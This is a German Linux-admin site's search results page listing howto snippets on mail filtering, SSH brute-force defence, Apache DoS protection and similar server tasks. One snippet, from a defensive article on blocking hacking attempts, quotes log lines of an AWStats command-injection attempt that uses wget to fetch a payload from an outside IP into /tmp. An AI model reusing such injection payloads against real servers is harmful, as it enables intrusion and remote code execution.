Linux-Distributionen
Huschi als Linux-Admin
Volltextsuche
30 Suchergebnisse
Seite 1 von 2 Seiten
- Web-Server:
robots.txtSinn der robots.txt Viele Robots/Spider/Crawler/Bots durchsuchen wahllos das Internet nach Inhalten. Manchmal ist es sinnvoll, bestimmte Seiten oder Bereiche der eigenen Site vor diesen Robots zu schützen. Beispiele: Seiten - Traffic:
Traffic über einzelne Ports messenIAM Hier hilft iam (iptables accounting monster) von http://intevation.de/iam/. iam arbeitet (wie der Name sagt) per IPtables und deren Logging funktionen. Es wertet die Logfiles aus und - Mail-Server » Qmail:
Plesk & Qmail: Integration von ClamAV (für Suse 9.x)Achtung! Neu! Vorher auch folgendes Howto lesen und entscheiden, welcher Weg der bessere für Euch ist: HowTo: Spamassassin und ClamAV unter Plesk einbinden Aus aktuellem Anlass habe ich - Security & Firewalls:
Hacking-Versuche unterbindenProblem: Es wird ständig versucht den Server zu hacken. Z.B. über's Web (es wird aber jeweils ein 404 ausgelöst): "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%[...] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%[...] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2 "POST /xmlrpc.php HTTP/1.1" "POST /blog/xmlrpc.php HTTP/1.1" "POST - Security & Firewalls:
SSH-BruteForce-Attacken eindämmenProblem: In den Logfiles stehen ständig Misslungene Einbruchsversuche auf dem SSH-Port. Lösungen: a) SSH-Port verlegen: in sshd_config den Parameter Port oder ListenAddress setzen. b) Per PAM-Modul: pam_abl c) Per - Mail-Server » Qmail:
Plesk & Qmail: Spamprotection mit GreylistingWas macht greylist? Greylisting ist eine effektive Methode zur Spam-Protection. Es block jede Email beim ersten Versuch. Erst wenn diese Email ein zweites Mal eingeliefert werden - Mail-Server » Qmail:
Plesk: Spamassassin und ClamAV per qsheff einbindenDas Orginal stammt aus dem Server-Support-Forum: V-Server Strato Spamassassin + ClamAV HowTo mit Qsheff (Ich veröffentliche es mit freundlicher Genemigung des Autors Dennis Hoofe.Verbessert mit Hilfe vom - Mail-Server:
SpamAssassin: sa-learn per Email fütternACHTUNG: Plesk/Qmail-User finden hier ein angepaßtes HowTo: Plesk: sa-learn per Email füttern SpamAssassin filtert zu wenig Spams Wer SpamAssassin auf seinem Server installiert hat, kennt das: Hin und - Linux (allgemein):
Wie kann ich Logfiles per Cron verschicken?Problem: Der ein oder andere mag seine Logfiles gerne zuhause auswerten oder speichern. Lösung: Als reinen Mailtext: mail ich@home.de -s "daily messages" < /var/log/messages Oder als Attachment mit mutt: mutt -n - Web-Server:
Apache: DoS-Attacken abfangenProblem: Regelmäßig kommen auf gut besuchten Webseiten DoS (Denial of Service) Attacken vor. Entweder sind es spielende Script-Kiddies, schlecht programmierte Spider/Crawler oder echte Angriffe. Funktion: Ein (hier Web-)Server - Mail-Server » Qmail:
Plesk/Qmail: sa-learn per Email fütternVorwort: Dieses HowTo basiert auf meine HowTo's SpamAssassin: sa-learn per Email füttern und Plesk/qmail: Email-Adresse an ein Script knüpfen, den passenden Thread im Server-Support-Forum und ist - Mail-Server:
Habe ich ein Open-Relay?Problem: Immer wenn Spam über den eigenen Server verschickt wird, fragt man sich: "Ist der Server ein Open-Relay-Server?" Erklärung: In der Regel reicht ein Blick in die Logfiles - Mail-Server:
SpamAssassin: "skipped message, greater than max message size"Problem: In den Logfiles tauchen Fehlermeldungen wie diese auf: spamc[...]: skipped message, greater than max message size (256000 bytes) Erklärung: Es ist durchaus sinnvoll ab einer gewissen Größe - Linux (allgemein):
Linux: geöffnete Dateien findenProblem: Bei Systemdiagnosen oder Problemen im laufenden Betrieb ist es Sinnvoll gewisse Zugriffe zu kontrollieren. Sobald es auf geöffnete Dateien, Sockets oder Ports geht hilft lsof. Beispiele: Erst - Linux (allgemein):
1und1-Server: /var/ zu kleinProblem: Was auch immer sich 1und1 dabei gedacht hat, es ist eine kleine Zeitbombe! Und zwar werden aktuelle (mind. seit September 2007) dedizierte Server mit folgender Partitionierung
[ Weitere ]